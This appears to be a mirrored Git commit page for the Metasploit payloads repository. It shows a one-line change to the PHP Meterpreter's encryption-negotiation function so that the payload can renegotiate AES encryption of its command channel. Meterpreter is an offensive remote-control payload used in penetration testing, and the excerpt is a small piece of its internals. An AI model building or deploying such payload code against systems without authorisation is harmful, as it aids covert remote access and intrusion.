github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Let PHP Meterpreter renegotiate CryptTLV

Browse Source
This commit is contained in:
Adam Cammack 2019-06-12 15:51:42 -05:00
parent 551eb74599
commit 390c52f755
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
1 changed files with 1 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
php/meterpreter/meterpreter.php
View File

@ -485,6 +485,7 @@ function core_negotiate_tlv_encryption($req, &$pkt) {
if (supports_aes()) {
my_print("AES functionality is supported");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256));
$GLOBALS['AES_ENABLED'] = false;
$GLOBALS['AES_KEY'] = rand_bytes(32);
if (function_exists('openssl_pkey_get_public') && function_exists('openssl_public_encrypt')) {
my_print("Encryption via public key is supported");